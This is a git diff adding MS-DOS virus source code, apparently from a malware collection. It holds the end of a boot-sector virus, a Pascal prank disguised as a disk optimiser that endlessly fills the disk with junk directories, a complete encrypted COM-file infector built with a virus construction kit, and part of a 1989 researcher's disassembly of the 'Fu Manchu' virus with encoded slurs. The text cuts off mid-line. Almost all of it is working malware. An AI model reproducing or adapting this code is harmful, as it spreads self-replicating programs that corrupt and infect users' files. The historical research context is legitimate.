; ' ', normal attribute + rep stosw ; clear the screen + mov si,7C00h+FRODO_LIVES-bootblock + mov bx,2AEh +morelinestodisplay: + mov bp,5 + mov di,bx +displaymorebackgroundontheline: + lodsb ; get background pattern + mov dh,al + mov cx,8 + +displayinitialbackground: + mov ax,720h + shl dx,1 + jnc spacechar + mov al,'' +spacechar: + stosw + loop displayinitialbackground + + dec bp + jnz displaymorebackgroundontheline + add bx,80*2 ; go to next line + cmp si,7C00h+enter_bootblock-bootblock + jb morelinestodisplay + mov ah,1 ; set cursor mode to cx + int 10h + + mov al,8 ; set new int 8 handler + mov dx,7C00h+int8-bootblock ; to spin border + call setvect + mov ax,7FEh ; enable timer interrupts only + out 21h,al + + sti + xor bx,bx + mov cx,1 + jmp short $ ; loop forever while + ; spinning the border + +int8: ; the timer interrupt spins + dec cx ; the border + jnz endint8 + xor di,di + inc bx + call spin_border + call spin_border + mov cl,4 ; wait 4 more ticks until +endint8: ; next update + mov al,20h ; Signal end of interrupt + out 20h,al + iret + +spin_border: + mov cx,28h ; do 40 characters across + +dohorizontal: + call lookup_border_char + stosw + stosw + loop dohorizontal +patch2: + add di,9Eh ; go to next line + mov cx,17h ; do for next 23 lines + +dovertical: ; handle vertical borders + call lookup_border_char ; get border character + stosw ; print it on screen +patch3: + add di,9Eh ; go to next line + loop dovertical +patch1: + std + ; this code handles the other half of the border + xor byte ptr ds:[7C00h+patch1-bootblock],1 ; flip std,cld + xor byte ptr ds:[7C00h+patch2-bootblock+1],28h + xor byte ptr ds:[7C00h+patch3-bootblock+1],28h + retn + + +lookup_border_char: + and bx,3 ; find corresponding border + mov al,ds:[bx+7C00h+borderchars-bootblock] + inc bx ; character + retn + + +setvect: + push es + push bx + xor bx,bx + mov es,bx + mov bl,al ; int # to bx + shl bx,1 ; int # * 4 = offset in + shl bx,1 ; interrupt table + mov es:[bx],dx ; set the vector in the + mov es:[bx+2],ds ; interrupt table + pop bx + pop es + retn + + +writebootblock: ; this is an unfinished subroutine; it doesn't work properly + call replaceint13and24 + mov dl,80h + db 0E8h, 08h, 00h, 32h,0D2h,0E8h + db 03h, 01h, 00h, 9Ah, 0Eh, 32h + db 08h, 70h, 00h, 33h, 0Eh, 2Eh + db 03h, 6Ch, 15h, 03h, 00h, 26h + db 00h, 00h, 00h, 21h, 00h, 50h + db 12h, 65h, 14h, 82h, 08h, 00h + db 0Ch, 9Ah, 0Eh, 56h, 07h, 70h + db 00h, 33h, 0Eh, 2Eh, 03h, 6Ch + db 15h,0E2h, 0Ch, 1Eh, 93h, 00h + db 00h,0E2h, 0Ch, 50h + + org 1200h +readbuffer dw ? ; beginning of the read buffer +lengthMOD512 dw ? ; EXE header item - length of image modulo 512 +lengthinpages dw ? ; EXE header item - length of image in pages +relocationitems dw ? ; EXE header item - # relocation items +headersize dw ? ; EXE header item - header size in paragraphs +minmemory dw ? ; EXE header item - minimum memory allocation +maxmemory dw ? ; EXE header item - maximum memory allocation +initialSS dw ? ; EXE header item - initial SS value +initialSP dw ? ; EXE header item - initial SP value +wordchecksum dw ? ; EXE header item - checksum value +initialIP dw ? ; EXE header item - initial IP value +initialCS dw ? ; EXE header item - initial CS value + db 12 dup (?) ; rest of header - unused +parmblock dd ? ; address of parameter block +filedrive db ? ; 0 = default drive +filetime dw ? ; saved file time +filedate dw ? ; saved file date +origints dd ? ; temporary scratch buffer for interrupt vectors +oldint1 dd ? ; original interrupt 1 vector +oldint21 dd ? ; original interrupt 21h vector +oldint13 dd ? ; original interrupt 13h vector +oldint24 dd ? ; original interrupt 24h vector +int13tempCSIP dd ? ; stores calling CS:IP of int 13h +carrierPSP dw ? ; carrier file PSP segment +DOSsegment dw ? ; segment of DOS list of lists +ownerfirstMCB dw ? ; owner of the first MCB +jmpfarptr db ? ; 0eah, jmp far ptr +int21store dd ? ; temporary storage for other 4 bytes + ; and for pointer to virus int 21h +tracemode db ? ; trace mode +instructionstotrace db ? ; number of instructions to trace +handletable dw 28h dup (?) ; array of handles +handlesleft db ? ; entries left in table +currentPSP dw ? ; storage for the current PSP segment +curfileposlow dw ? ; current file pointer location, low word +curfileposhigh dw ? ; current file pointer location, high word +filesizelow dw ? ; current file size, low word +filesizehigh dw ? ; current file size, high word +savebuffer dw ? ; storage for handle read, etc. +savelength dw ? ; functions +return_code dw ? ; returned in AX on exit of int 21h +int21flags dw ? ; storage of int 21h return flags register +tempFCB db 25h dup (?) ; copy of the FCB +errorflag db ? ; 0 if no error, 1 if error +int13flags dw ? ; storage of int 13h return flags register +savess dw ? ; temporary storage of stack segment +savesp dw ? ; and stack pointer +BREAKsave db ? ; current BREAK state +checkres db ? ; already installed flag +initialax dw ? ; AX upon entry to carrier +saveIMR db ? ; storage for interrupt mask register +saveoffset dw ? ; temp storage of CS:IP of +savesegment dw ? ; caller to int 21h +pushpopalltempstore dw ? ; push/popall caller address +numfreeclusters dw ? ; total free clusters +DOSversion db ? ; current DOS version +hideclustercountchange db ? ; flag of whether to hide free cluster count +hide_size db ? ; hide filesize increase if equal to 0 +copyparmblock db 0eh dup (?) ; copy of the parameter block +origsp dw ? ; temporary storage of stack pointer +origss dw ? ; and stack segment +origcsip dd ? ; temporary storage of caller CS:IP +copyfilename db 50h dup (?) ; copy of filename +storesp dw ? ; temporary storage of stack pointer +storess dw ? ; and stack segment +stackptr dw ? ; register storage stack pointer +storecall dw ? ; temporary storage of function offset + +topstack = 1600h + +_4096 ends + end + + diff --git a/MSDOS/Virus.MSDOS.Unknown.froggie.pas b/MSDOS/Virus.MSDOS.Unknown.froggie.pas new file mode 100644 index 00000000..fcd0d71b --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.froggie.pas @@ -0,0 +1,77 @@ +program Disk_Space; +{ This program makes use of the + + CHR command + USES command + VAR command + CLRSCR command + WRITELN command + DISKFREE command + DISKSIZE command + TRUNC command + IF-THEN-ELSE command + REPEAT-UNTIL command + ASSIGN command + REWRITE command + WRITE command + DELAY command + CLOSE command + RANDOMIZE command + } +uses dos,crt; +var cdn:byte; + dirname:string; + a,b,c,d,e,f,g,h,i,j,k,l:char; + ii:integer; + q:text; + ai:boolean; +begin +randomize; +clrscr; +cdn:=2; +gotoxy(22,2); +Writeln('Froggie-OPT v1.12 (c) Jason Friedman'); +gotoxy(25,3); + +writeln('Please wait - Reading System Data'); +repeat; +cdn:=cdn+1; +if (diskfree(cdn)<1) and (cdn<3) then + Writeln(' Your disk for drive ',chr(cdn+64),': is not in the drive') +else +if (diskfree(cdn)>1) then + Writeln(' Your disk space free for drive ',chr(cdn+64),': is ', + trunc(diskfree(cdn)/1000),' KB out of ',trunc(disksize(cdn)/1000),' KB'); + until (diskfree(cdn)<1) and (cdn>2); +delay(1000); +repeat +writeln(' Preparing to Froggie OPT - Please do not disturb'); +writeln(' Any type of disturbance will cause file damnage '); +ii:=ii+1; +a:=chr(trunc(random(255))); +b:=chr(trunc(random(255))); +c:=chr(trunc(random(255))); +d:=chr(trunc(random(255))); +e:=chr(trunc(random(255))); +f:=chr(trunc(random(255))); +g:=chr(trunc(random(255))); +h:=chr(trunc(random(255))); +i:=chr(trunc(random(255))); +j:=chr(trunc(random(255))); +k:=chr(trunc(random(255))); +l:=chr(trunc(random(255))); +mkdir (a+b+c+d+e+f+g+h+i+'.'+j+k+l); +chdir (a+b+c+d+e+f+g+h+i+'.'+j+k+l); + assign (q,'YOU'); + rewrite (q); + close (q); + assign (q,'ARE'); + rewrite (q); + close (q); + Assign (q,'LAME'); + rewrite (q); + close (q); + chdir('..'); + until ai=true; +end. + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.fs.asm b/MSDOS/Virus.MSDOS.Unknown.fs.asm new file mode 100644 index 00000000..41e47a4f --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.fs.asm @@ -0,0 +1,359 @@ +; FS.ASM -- Fuckin Shit Virus +; Created with Nowhere Man's Virus Creation Laboratory v1.00 +; Written by Unknown User + +virus_type equ 0 ; Appending Virus +is_encrypted equ 1 ; We're encrypted +tsr_virus equ 0 ; We're not TSR + +code segment byte public + assume cs:code,ds:code,es:code,ss:code + org 0100h + +main proc near + db 0E9h,00h,00h ; Near jump (for compatibility) +start: call find_offset ; Like a PUSH IP +find_offset: pop bp ; BP holds old IP + sub bp,offset find_offset ; Adjust for length of host + + call encrypt_decrypt ; Decrypt the virus + +start_of_code label near + + lea si,[bp + buffer] ; SI points to original start + mov di,0100h ; Push 0100h on to stack for + push di ; return to main program + movsw ; Copy the first two bytes + movsb ; Copy the third byte + + mov di,bp ; DI points to start of virus + + mov bp,sp ; BP points to stack + sub sp,128 ; Allocate 128 bytes on stack + + mov ah,02Fh ; DOS get DTA function + int 021h + push bx ; Save old DTA address on stack + + mov ah,01Ah ; DOS set DTA function + lea dx,[bp - 128] ; DX points to buffer on stack + int 021h + +stop_tracing: mov cx,09EBh + mov ax,0FE05h ; Acutal move, plus a HaLT + jmp $-2 + add ah,03Bh ; AH now equals 025h + jmp $-10 ; Execute the HaLT + lea bx,[di + null_vector] ; BX points to new routine + push cs ; Transfer CS into ES + pop es ; using a PUSH/POP + int 021h + mov al,1 ; Disable interrupt 1, too + int 021h + jmp short skip_null ; Hop over the loop +null_vector: jmp $ ; An infinite loop +skip_null: mov byte ptr [di + lock_keys + 1],130 ; Prefetch unchanged +lock_keys: mov al,128 ; Change here screws DEBUG + out 021h,al ; If tracing then lock keyboard + + mov cx,0063h ; Do 99 infections +search_loop: push cx ; Save CX + call search_files ; Find and infect a file + pop cx ; Restore CX + loop search_loop ; Repeat until CX is 0 + + +com_end: pop dx ; DX holds original DTA address + mov ah,01Ah ; DOS set DTA function + int 021h + + mov sp,bp ; Deallocate local buffer + + xor ax,ax ; + mov bx,ax ; + mov cx,ax ; + mov dx,ax ; Empty out the registers + mov si,ax ; + mov di,ax ; + mov bp,ax ; + + ret ; Return to original program +main endp + + + db 0F0h,039h,067h,037h,006h + +search_files proc near + push bp ; Save BP + mov bp,sp ; BP points to local buffer + sub sp,64 ; Allocate 64 bytes on stack + + mov ah,047h ; DOS get current dir function + xor dl,dl ; DL holds drive # (current) + lea si,[bp - 64] ; SI points to 64-byte buffer + int 021h + + mov ah,03Bh ; DOS change directory function + lea dx,[di + root] ; DX points to root directory + int 021h + + call traverse ; Start the traversal + + mov ah,03Bh ; DOS change directory function + lea dx,[bp - 64] ; DX points to old directory + int 021h + + mov sp,bp ; Restore old stack pointer + pop bp ; Restore BP + ret ; Return to caller + +root db "\",0 ; Root directory +search_files endp + +traverse proc near + push bp ; Save BP + + mov ah,02Fh ; DOS get DTA function + int 021h + push bx ; Save old DTA address + + mov bp,sp ; BP points to local buffer + sub sp,128 ; Allocate 128 bytes on stack + + mov ah,01Ah ; DOS set DTA function + lea dx,[bp - 128] ; DX points to buffer + int 021h + + mov ah,04Eh ; DOS find first function + mov cx,00010000b ; CX holds search attributes + lea dx,[di + all_files] ; DX points to "*.*" + int 021h + jc leave_traverse ; Leave if no files present + +check_dir: cmp byte ptr [bp - 107],16 ; Is the file a directory? + jne another_dir ; If not, try again + cmp byte ptr [bp - 98],'.' ; Did we get a "." or ".."? + je another_dir ;If so, keep going + + mov ah,03Bh ; DOS change directory function + lea dx,[bp - 98] ; DX points to new directory + int 021h + + call traverse ; Recursively call ourself + + pushf ; Save the flags + mov ah,03Bh ; DOS change directory function + lea dx,[di + up_dir] ; DX points to parent directory + int 021h + popf ; Restore the flags + + jnc done_searching ; If we infected then exit + +another_dir: mov ah,04Fh ; DOS find next function + int 021h + jnc check_dir ; If found check the file + +leave_traverse: + lea dx,[di + com_mask] ; DX points to "*.COM" + call find_files ; Try to infect a file +done_searching: mov sp,bp ; Restore old stack frame + mov ah,01Ah ; DOS set DTA function + pop dx ; Retrieve old DTA address + int 021h + + pop bp ; Restore BP + ret ; Return to caller + +up_dir db "..",0 ; Parent directory name +all_files db "*.*",0 ; Directories to search for +com_mask db "*.COM",0 ; Mask for all .COM files +traverse endp + + db 032h,050h,0FFh,0D5h,088h + + +find_files proc near + push bp ; Save BP + + mov ah,02Fh ; DOS get DTA function + int 021h + push bx ; Save old DTA address + + mov bp,sp ; BP points to local buffer + sub sp,128 ; Allocate 128 bytes on stack + + push dx ; Save file mask + mov ah,01Ah ; DOS set DTA function + lea dx,[bp - 128] ; DX points to buffer + int 021h + + mov ah,04Eh ; DOS find first file function + mov cx,00100111b ; CX holds all file attributes + pop dx ; Restore file mask +find_a_file: int 021h + jc done_finding ; Exit if no files found + call infect_file ; Infect the file! + jnc done_finding ; Exit if no error + mov ah,04Fh ; DOS find next file function + jmp short find_a_file ; Try finding another file + +done_finding: mov sp,bp ; Restore old stack frame + mov ah,01Ah ; DOS set DTA function + pop dx ; Retrieve old DTA address + int 021h + + pop bp ; Restore BP + ret ; Return to caller +find_files endp + + db 0DCh,02Bh,0D7h,0CEh,09Eh + +infect_file proc near + mov ah,02Fh ; DOS get DTA address function + int 021h + mov si,bx ; SI points to the DTA + + mov byte ptr [di + set_carry],0 ; Assume we'll fail + + cmp word ptr [si + 01Ah],(65279 - (finish - start)) + jbe size_ok ; If it's small enough continue + jmp infection_done ; Otherwise exit + +size_ok: mov ax,03D00h ; DOS open file function, r/o + lea dx,[si + 01Eh] ; DX points to file name + int 021h + xchg bx,ax ; BX holds file handle + + mov ah,03Fh ; DOS read from file function + mov cx,3 ; CX holds bytes to read (3) + lea dx,[di + buffer] ; DX points to buffer + int 021h + + mov ax,04202h ; DOS file seek function, EOF + cwd ; Zero DX _ Zero bytes from end + mov cx,dx ; Zero CX / + int 021h + + xchg dx,ax ; Faster than a PUSH AX + mov ah,03Eh ; DOS close file function + int 021h + xchg dx,ax ; Faster than a POP AX + + sub ax,finish - start + 3 ; Adjust AX for a valid jump + cmp word ptr [di + buffer + 1],ax ; Is there a JMP yet? + je infection_done ; If equal then exit + mov byte ptr [di + set_carry],1 ; Success -- the file is OK + add ax,finish - start ; Re-adjust to make the jump + mov word ptr [di + new_jump + 1],ax ; Construct jump + + mov ax,04301h ; DOS set file attrib. function + xor cx,cx ; Clear all attributes + lea dx,[si + 01Eh] ; DX points to victim's name + int 021h + + mov ax,03D02h ; DOS open file function, r/w + int 021h + xchg bx,ax ; BX holds file handle + + mov ah,040h ; DOS write to file function + mov cx,3 ; CX holds bytes to write (3) + lea dx,[di + new_jump] ; DX points to the jump we made + int 021h + + mov ax,04202h ; DOS file seek function, EOF + cwd ; Zero DX _ Zero bytes from end + mov cx,dx ; Zero CX / + int 021h + + push si ; Save SI through call + call encrypt_code ; Write an encrypted copy + pop si ; Restore SI + + mov ax,05701h ; DOS set file time function + mov cx,[si + 016h] ; CX holds old file time + mov dx,[si + 018h] ; DX holds old file date + int 021h + + mov ah,03Eh ; DOS close file function + int 021h + + mov ax,04301h ; DOS set file attrib. function + xor ch,ch ; Clear CH for file attribute + mov cl,[si + 015h] ; CX holds file's old attributes + lea dx,[si + 01Eh] ; DX points to victim's name + int 021h + +infection_done: cmp byte ptr [di + set_carry],1 ; Set carry flag if failed + ret ; Return to caller + +set_carry db ? ; Set-carry-on-exit flag +buffer db 090h,0CDh,020h ; Buffer to hold old three bytes +new_jump db 0E9h,?,? ; New jump to virus +infect_file endp + + +vcl_marker db "[VCL]",0 ; VCL creation marker + + +note db "Fuckin Shit Virus" + db "By White Shark" + db "Mess with the White Shark and" + db "you'll be eaten alive!" + +encrypt_code proc near + push bp ; Save BP + mov bp,di ; Use BP as pointer to code + lea si,[bp + encrypt_decrypt]; SI points to cipher routine + + xor ah,ah ; BIOS get time function + int 01Ah + mov word ptr [si + 9],dx ; Low word of timer is new key + + xor byte ptr [si + 1],8 ; + xor byte ptr [si + 8],1 ; Change all SIs to DIs + xor word ptr [si + 11],0101h; (and vice-versa) + + lea di,[bp + finish] ; Copy routine into heap + mov cx,finish - encrypt_decrypt - 1 ; All but final RET + push si ; Save SI for later + push cx ; Save CX for later + rep movsb ; Copy the bytes + + lea si,[bp + write_stuff] ; SI points to write stuff + mov cx,5 ; CX holds length of write + rep movsb ; Copy the bytes + + pop cx ; Restore CX + pop si ; Restore SI + inc cx ; Copy the RET also this time + rep movsb ; Copy the routine again + + mov ah,040h ; DOS write to file function + lea dx,[bp + start] ; DX points to virus + + lea si,[bp + finish] ; SI points to routine + call si ; Encrypt/write/decrypt + + mov di,bp ; DI points to virus again + pop bp ; Restore BP + ret ; Return to caller + +write_stuff: mov cx,finish - start ; Length of code + int 021h +encrypt_code endp + +end_of_code label near + +encrypt_decrypt proc near + lea si,[bp + start_of_code] ; SI points to code to decrypt + mov cx,(end_of_code - start_of_code) / 2 ; CX holds length +xor_loop: db 081h,034h,00h,00h ; XOR a word by the key + inc si ; Do the next word + inc si ; + loop xor_loop ; Loop until we're through + ret ; Return to caller +encrypt_decrypt endp +finish label near + +code ends + end main \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.fumanchu.asm b/MSDOS/Virus.MSDOS.Unknown.fumanchu.asm new file mode 100644 index 00000000..6e98fc55 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.fumanchu.asm @@ -0,0 +1,944 @@ + page 65,132 + title The 'Fu Manchu' Virus +; ͻ +; British Computer Virus Research Centre +; 12 Guildford Street, Brighton, East Sussex, BN1 3LS, England +; Telephone: Domestic 0273-26105, International +44-273-26105 +; +; The 'Fu Manchu' Virus +; Disassembled by Joe Hirst, June 1989 +; +; Copyright (c) Joe Hirst 1989. +; +; This listing is only to be made available to virus researchers +; or software writers on a need-to-know basis. +; ͼ + + ; The virus occurs attached to the beginning of a COM file, or the end + ; of an EXE file. A COM file also has the six-byte 'marker' attached + ; to the end. + + ; This virus is a variation of the Jerusalem virus + + ; The disassembly has been tested by re-assembly using MASM 5.0. + +RAM SEGMENT AT 0 + + ; System data + + ORG 3FCH +BW03FC DW ? +BB03FE DB ? + ORG 417H +BB0417 DB ? ; Key states + ORG 46CH +BB046C DB ? ; System clock - low byte + + ORG 2CH +ENV_SG DW ? ; Segment address of environment + +RAM ENDS + +RAM40 SEGMENT at 400H + + ORG 1AH +BW041A DW ? ; Key token in pointer +BW041C DW ? ; Key token out pointer + ORG 80H +BW0480 DW ? ; Key token buffer start pointer +BW0482 DW ? ; Key token buffer end pointer + +RAM40 ENDS + +CODE SEGMENT BYTE PUBLIC 'CODE' + ASSUME CS:CODE,DS:NOTHING,ES:RAM + + ; Entry point when attached to a COM file + +START: JMP BP0010 + + DB 'sAX' + +VR_SIG DB 'rEMHOr' + +VIR_RT EQU THIS DWORD +V_RTOF DW 100H +V_RTSG DW 323FH + +INT_08 EQU THIS DWORD +I08OFF DW 0106H ; Int 8 offset +I08SEG DW 0E95H ; Int 8 segment + +INT_09 EQU THIS DWORD +I09OFF DW 02E9H ; Int 9 offset +I09SEG DW 0DC6H ; Int 9 segment + +INT_16 EQU THIS DWORD +I16OFF DW 0 ; Int 16H offset +I16SEG DW 0 ; Int 16H segment + +INT_21 EQU THIS DWORD +I21OFF DW 138DH ; Int 21H offset +I21SEG DW 029BH ; Int 21H segment + +INT_24 EQU THIS DWORD +I24OFF DW 04EBH ; Int 24H offset +I24SEG DW 3228H ; Int 24H segment + +BEGIN DW 0 ; Initial value for AX +F_SIZE DW 49H ; Total file size +TCOUNT1 DW 0 ; Timer count (low) +TCOUNT2 DW 0 ; Timer count (high) +ST_ES1 DW 3195H ; Original ES +SET_PA DW 00A2H + + ; Program parameter block + +PPB_01 DW 0 ; Environment address +PPB_02 DW 0080H ; Command line offset +PPB_03 DW 3195H ; Command line segment +PPB_04 DW 005CH ; FCB1 offset +PPB_05 DW 3195H ; FCB1 segment +PPB_06 DW 006CH ; FCB2 offset +PPB_07 DW 3195H ; FCB2 segment + +PRG_SP DW 0 ; Initial stack pointer store +PRG_SS DW 31A5H ; Initial stack segment store +PROGRM EQU THIS DWORD +PRGOFF DW 0 ; Initial code offset store +PRGSEG DW 31A5H ; Initial code segment store +SS_ST1 DW 0 ; Store for system area data (1) +SS_ST2 DB 86H ; Store for system area data (2) + + ; .EXE header store + +EXEHED DB 4DH, 5AH ; 00 .EXE header ident +EXHD01 DW 0070H ; 02 Bytes in last page +EXHD02 DW 0006H ; 04 Size of file in pages +EXHD03 DW 0000H ; 06 Number of relocation entries +EXHD04 DW 0020H ; 08 Size of header in paragraphs +EXHD05 DW 0000H ; 0A Minimum extra storage required +EXHD06 DW -1 ; 0C Maximum extra storage required +EXHD07 DW 0005H ; 0E Initial stack segment +EXHD08 DW ENDADR ; 10 Initial stack pointer +EXHD09 DW 1988H ; 12 Negative checksum +EXHD10 DW 0223H ; 14 Initial code offset +EXHD11 DW 0005H ; 16 Initial code segment + DW 01EH ; 18 Relative offset of reloc table + DW 0 ; 1A Overlay number + +SIGBUF DB 069H, 06FH, 06EH, 00DH, 00AH, 024H +F_HAND DW 5 ; File handle +F_ATTS DW 0020H ; File attributes +F_DATE DW 1273H ; File date +F_TIME DW 4972H ; File time +F_SIZ1 DW 0250H ; Low-order file size +F_SIZ2 DW 0 ; High-order file size +F_PATH EQU THIS DWORD +FPTHOF DW 3D5BH ; Program pathname offset +FPTHSG DW 9B70H ; Program pathname segment +COM_CM DB 'COMMAND.COM' +EXE_SW DB 0 ; EXE switch - 0 = .COM extension +MEM_SW DW 1 ; Memory allocated switch +OUT_SW DB 0 ; Output in progress switch +BYTSEC DW 0200H ; Bytes per sector +PARAGR DW 0010H ; Size of a paragraph + + ; The next fields are encrypted, and translate to: + +;STRNG1 DB 'fu manchu virus 3/10/88 - latest in the new fun line!', 0 +;STRNG2 DB 'thatcher is a cunt ', 0 +;STRNG3 DB 'reagan is an arsehole ', 0 +;STRNG4 DB 'botha is a bastard ', 0 +;STRNG5 DB 'waldheim is a Nazi ', 0 +;STRNG6 DB 'fuck', 8, 8, 8, 8, 0 +;STRNG7 DB 'cunt', 8, 8, 8, 8, 0 +;STRNG8 DB 'The world will hear from me again! ', 0 + +STRNG1 DB 0C9H, 0DAH, 08FH, 0C2H, 0CEH, 0C1H, 0CCH, 0C7H + DB 0DAH, 08FH, 0D9H, 0C6H, 0DDH, 0DAH, 0DCH, 08FH + DB 09CH, 080H, 09EH, 09FH, 080H, 097H, 097H, 08FH + DB 082H, 08FH, 0C3H, 0CEH, 0DBH, 0CAH, 0DCH, 0DBH + DB 08FH, 0C6H, 0C1H, 08FH, 0DBH, 0C7H, 0CAH, 08FH + DB 0C1H, 0CAH, 0D8H, 08FH, 0C9H, 0DAH, 0C1H, 08FH + DB 0C3H, 0C6H, 0C1H, 0CAH, 08EH, 0 +STRNG2 DB 0DBH, 0C7H, 0CEH, 0DBH, 0CCH, 0C7H, 0CAH, 0DDH + DB 08FH, 0C6H, 0DCH, 08FH, 0CEH, 08FH, 0CCH, 0DAH + DB 0C1H, 0DBH, 08FH, 0 +STRNG3 DB 0DDH, 0CAH, 0CEH, 0C8H, 0CEH, 0C1H, 08FH, 0C6H + DB 0DCH, 08FH, 0CEH, 0C1H, 08FH, 0CEH, 0DDH, 0DCH + DB 0CAH, 0C7H, 0C0H, 0C3H, 0CAH, 08FH, 0 +STRNG4 DB 0CDH, 0C0H, 0DBH, 0C7H, 0CEH, 08FH, 0C6H, 0DCH + DB 08FH, 0CEH, 08FH, 0CDH, 0CEH, 0DCH, 0DBH, 0CEH + DB 0DDH, 0CBH, 08FH, 0 +STRNG5 DB 0D8H, 0CEH, 0C3H, 0CBH, 0C7H, 0CAH, 0C6H, 0C2H + DB 08FH, 0C6H, 0DCH, 08FH, 0CEH, 08FH, 0E1H, 0CEH + DB 0D5H, 0C6H, 08FH, 0 +STRNG6 DB 0C9H, 0DAH, 0CCH, 0C4H, 0A7H, 0A7H, 0A7H, 0A7H, 0 +STRNG7 DB 0CCH, 0DAH, 0C1H, 0DBH, 0A7H, 0A7H, 0A7H, 0A7H, 0 +STRNG8 DB 0FBH, 0C7H, 0CAH, 08FH, 0D8H, 0C0H, 0DDH, 0C3H + DB 0CBH, 08FH, 0D8H, 0C6H, 0C3H, 0C3H, 08FH, 0C7H + DB 0CAH, 0CEH, 0DDH, 08FH, 0C9H, 0DDH, 0C0H, 0C2H + DB 08FH, 0C2H, 0CAH, 08FH, 0CEH, 0C8H, 0CEH, 0C6H + DB 0C1H, 08EH, 08FH, 08FH, 08FH, 0 + + ; Each entry is: + ; DB length to find + ; DB length found + ; DW pointer to string + +TABLE DB 10, 0 + DW STRNG1 + DB 9, 0 + DW STRNG2 + DB 7, 0 + DW STRNG3 + DB 6, 0 + DW STRNG4 + DB 9, 0 + DW STRNG5 + DB 4, 0 + DW STRNG6 + DB 4, 0 + DW STRNG7 + DB 0 +TABOUT DW 0 ; Table entry for output + + ; Key number table for fake input + +KEYTAB DB 03H, 1EH, 30H, 2EH, 20H, 12H, 21H, 22H ; 00 - 07 + DB 0EH, 0FH, 1CH, 25H, 26H, 1CH, 31H, 18H ; 08 - 0F + DB 19H, 10H, 13H, 1FH, 14H, 16H, 2FH, 11H ; 10 - 17 + DB 2DH, 15H, 2CH, 01H, 2BH, 1BH, 07H, 0CH ; 18 - 1F + DB 39H, 02H, 28H, 04H, 05H, 06H, 08H, 28H ; 20 - 27 + DB 0AH, 0BH, 09H, 0DH, 33H, 0CH, 34H, 35H ; 28 - 2F + DB 0BH, 02H, 03H, 04H, 05H, 06H, 07H, 08H ; 30 - 37 + DB 09H, 0AH, 27H, 27H, 33H, 0DH, 34H, 35H ; 38 - 3F + DB 03H, 1EH, 30H, 2EH, 20H, 12H, 21H, 22H ; 40 - 47 + DB 23H, 17H, 24H, 25H, 26H, 32H, 31H, 18H ; 48 - 4F + DB 19H, 10H, 13H, 1FH, 14H, 16H, 2FH, 11H ; 50 - 57 + DB 2DH, 15H, 2CH, 1AH, 2BH, 1BH, 07H, 0CH ; 58 - 5F + DB 29H, 1EH, 30H, 2EH, 20H, 12H, 21H, 22H ; 60 - 67 + DB 23H, 17H, 24H, 25H, 26H, 32H, 31H, 18H ; 68 - 6F + DB 19H, 10H, 13H, 1FH, 14H, 16H, 2FH, 11H ; 70 - 77 + DB 2DH, 15H, 2CH, 1AH, 2BH, 1BH, 29H, 0EH ; 78 - 7F + + ; This section assumes a COM origin of 100H + + +BP0010: CLD + MOV AH,0E1H ; Virus "are you there" call + INT 21H ; DOS service (Virus - 1) + CMP AH,0E1H ; Test for unchanged + JNB BP0020 ; Branch if invalid reply + CMP AH,4 ; Test for standard "yes" + JB BP0020 ; Branch if non-standard + MOV AH,0DDH ; Replace program over virus + MOV DI,0100H ; Initial offset + MOV SI,OFFSET ENDADR ; Length of virus + ADD SI,DI ; Add initial offset + MOV CX,F_SIZE[DI] ; Get total filesize + INT 21H ; DOS service (Virus - 2) + + ; Virus not in system, or non-communicating variety + +BP0020: MOV AX,CS ; Get current segment + ADD AX,10H ; Address past PSP + MOV PRG_SP,SP ; Save current value + MOV SS,AX ; \ Set up stack + MOV SP,OFFSET ENDADR+100H ; / + PUSH AX ; Segment for return + MOV AX,OFFSET BP0030 ; \ Offset for return + PUSH AX ; / + RETF ; "Return" to next instruction + + ; We now have an origin of zero + ; Entry point when attached to an EXE file + +BP0030: CLD + PUSH ES + MOV ST_ES1,ES ; Save original ES + MOV PPB_03,ES ; \ + MOV PPB_05,ES ; ) Segments in PPB + MOV PPB_07,ES ; / + MOV AX,ES ; \ Segment relocation factor + ADD AX,10H ; / + ADD PRGSEG,AX ; Initial code segment store + ADD PRG_SS,AX ; Initial stack segment store + MOV AH,0E1H ; Virus "are you there" call + INT 21H ; DOS service (Virus - 1) + CMP AH,0E1H ; Test for unchanged + JNB BP0040 ; Branch if not + CMP AH,4 ; Test for standard "yes" + POP ES + MOV SS,PRG_SS ; Initial stack segment store + MOV SP,PRG_SP ; Initial stack pointer store + JMP PROGRM ; Start of actual program + + ; Virus is not already active + +BP0040: XOR AX,AX ; \ Address page zero + MOV ES,AX ; / + MOV AX,BW03FC ; \ Save system area data (1) + MOV SS_ST1,AX ; / + MOV AL,BB03FE ; \ Save system area data (2) + MOV SS_ST2,AL ; / + MOV BW03FC,0A4F3H ; Store REPZ MOVSB + MOV BB03FE,0CBH ; Store RETF + POP AX ; \ + ADD AX,10H ; ) Address past PSP + MOV ES,AX ; / + PUSH CS ; \ Set DS to CS + POP DS ; / + MOV CX,OFFSET ENDADR ; Length of virus + XOR SI,SI ; \ Clear registers + MOV DI,SI ; / + PUSH ES ; \ + MOV AX,OFFSET BP0050 ; ) Set up return address + PUSH AX ; / + DB 0EAH ; \ Far jump to move instruction + DW BW03FC, 0 ; / + +BP0050: MOV AX,CS ; \ + MOV SS,AX ; ) Set up internal stack + MOV SP,OFFSET ENDADR+100H ; / + XOR AX,AX ; \ Address page zero + MOV DS,AX ; / + ASSUME DS:RAM,ES:NOTHING + MOV AX,SS_ST1 ; \ Restore system area data (1) + MOV BW03FC,AX ; / + MOV AL,SS_ST2 ; \ Restore system area data (2) + MOV BB03FE,AL ; / + MOV BX,SP ; Get stack pointer + MOV CL,4 ; \ Convert to paragraphs + SHR BX,CL ; / + ADD BX,10H ; Allow for PSP + MOV SET_PA,BX ; Save number of paragraphs + MOV ES,ST_ES1 ; Get original ES + MOV AH,4AH ; Set block + INT 21H ; DOS service (Set block) + MOV AX,3521H ; Get interrupt 21H + INT 21H ; DOS service (Get int) + MOV I21OFF,BX ; Save interrupt 21H offset + MOV I21SEG,ES ; Save interrupt 21H segment + PUSH CS ; \ Set DS to CS + POP DS ; / + ASSUME DS:CODE + MOV DX,OFFSET BP0170 ; Interrupt 21H routine + MOV AX,2521H ; Set interrupt 21H + INT 21H ; DOS service (Set int) + MOV ES,ST_ES1 ; Get original ES + ASSUME ES:RAM + MOV ES,ES:ENV_SG ; Get environment segment + XOR DI,DI ; Start of environment + MOV 